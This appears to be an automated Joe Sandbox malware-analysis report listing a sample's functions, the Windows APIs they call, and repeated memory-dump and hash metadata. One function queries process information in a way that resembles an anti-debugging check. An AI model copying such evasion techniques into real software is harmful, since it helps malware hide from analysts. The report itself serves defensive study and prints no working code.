                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4291131564-0
                                                                                                                                                                        • Opcode ID: 4b05967053b90ca7063e771e22bdb0233ed80f9fbb0524c2d37fb18bb7a2e843
                                                                                                                                                                        • Instruction ID: cb7d715cb997a14ed031050a0e925c873b5d5a421ca132f6509f63ca1165de2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b05967053b90ca7063e771e22bdb0233ed80f9fbb0524c2d37fb18bb7a2e843
                                                                                                                                                                        • Instruction Fuzzy Hash: 98F0C474102234BBDB326F66DC49E9B7FACEF0ABA0F100455F909DA250D7718A40DBA1
                                                                                                                                                                        Function 0018145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0018146D
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000), ref: 00181474
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentInformationQuery
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3953534283-0
                                                                                                                                                                        • Opcode ID: 8437ee90f842dfdc8b8468ccba0eefcb837078989cdd4aaab461a31ae3abe5fb
                                                                                                                                                                        • Instruction ID: b496fd48f2de33c5f725f98a217794ad9d80878f3d5b985c98e388b0721d9626
                                                                                                                                                                        • Opcode Fuzzy Hash: 8437ee90f842dfdc8b8468ccba0eefcb837078989cdd4aaab461a31ae3abe5fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 03E01272640204F7EB11ABA0EC0AF5F77AC9B00789F100155A616E50D0D7B8DB00DB65
                                                                                                                                                                        Function 001AB5A6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumSystemLocalesA.KERNEL32(Function_0002B211,00000001), ref: 001AB5BF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                        • Opcode ID: 76d2dcebae26191d3caa3089e7325300384e22e9ba15374c58e89a8780bc1c84
                                                                                                                                                                        • Instruction ID: 62d31424136d91eadbe96528effc4596c82682a42e86aeabcd9f14b815110047
                                                                                                                                                                        • Opcode Fuzzy Hash: 76d2dcebae26191d3caa3089e7325300384e22e9ba15374c58e89a8780bc1c84
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D0A7759547405BD7204F34DD897F177E0FB12B16F30994EDC92454C1D7B4A5C98600
                                                                                                                                                                        Function 001A767E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002763C), ref: 001A7683
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: fbee52dafb1174bcd6d484135a7f090ec2b896558db07cd4c108552bae68b8fb
                                                                                                                                                                        • Instruction ID: bb1851e1415991622625ec5a54c58e91c79878f7f2b1557541b16845c2a2b1a4
                                                                                                                                                                        • Opcode Fuzzy Hash: fbee52dafb1174bcd6d484135a7f090ec2b896558db07cd4c108552bae68b8fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E9002A5259A404696061B785C4D50625A46B4D706F410550B045C44D4DB90C140A951
                                                                                                                                                                        Function 001ACD7E Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9f517ea18d4bd82b618acf8cb4655a3d45c3bd366c35b6acea4c9dcc7b22f6ec
                                                                                                                                                                        • Instruction ID: 7c21cb9cc685d52b1b3c5aee358b437c772ffe5b0fc0b3b187353d63508d1992
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f517ea18d4bd82b618acf8cb4655a3d45c3bd366c35b6acea4c9dcc7b22f6ec
                                                                                                                                                                        • Instruction Fuzzy Hash: DB02D177D49AB24B8B764EF904D02277FA15E42B5031F86AADDD03F586C312ED0696E0
                                                                                                                                                                        Function 001ADD6B Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                        • Instruction ID: 4ae5d8cca1c642a3532f62b596a36a9495c58fc0522ad3299538e26d3e57fede
                                                                                                                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                        • Instruction Fuzzy Hash: 75C17BB7D0A9B2098B36466D141823FEFA26ED3B5031FC3A5DCD13F989C722AD1596D0
                                                                                                                                                                        Function 001AD983 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                        • Instruction ID: d8402bad39bd196eec70b2c7691ff0256fdef17f12f1b81b7fead0d3fed9cdca
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                        • Instruction Fuzzy Hash: 21C16BB7D0EDB2098B36466D245823AEFA26ED3B5131F8395DCD13F989C322AD05D6D0
                                                                                                                                                                        Function 001AD5B1 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
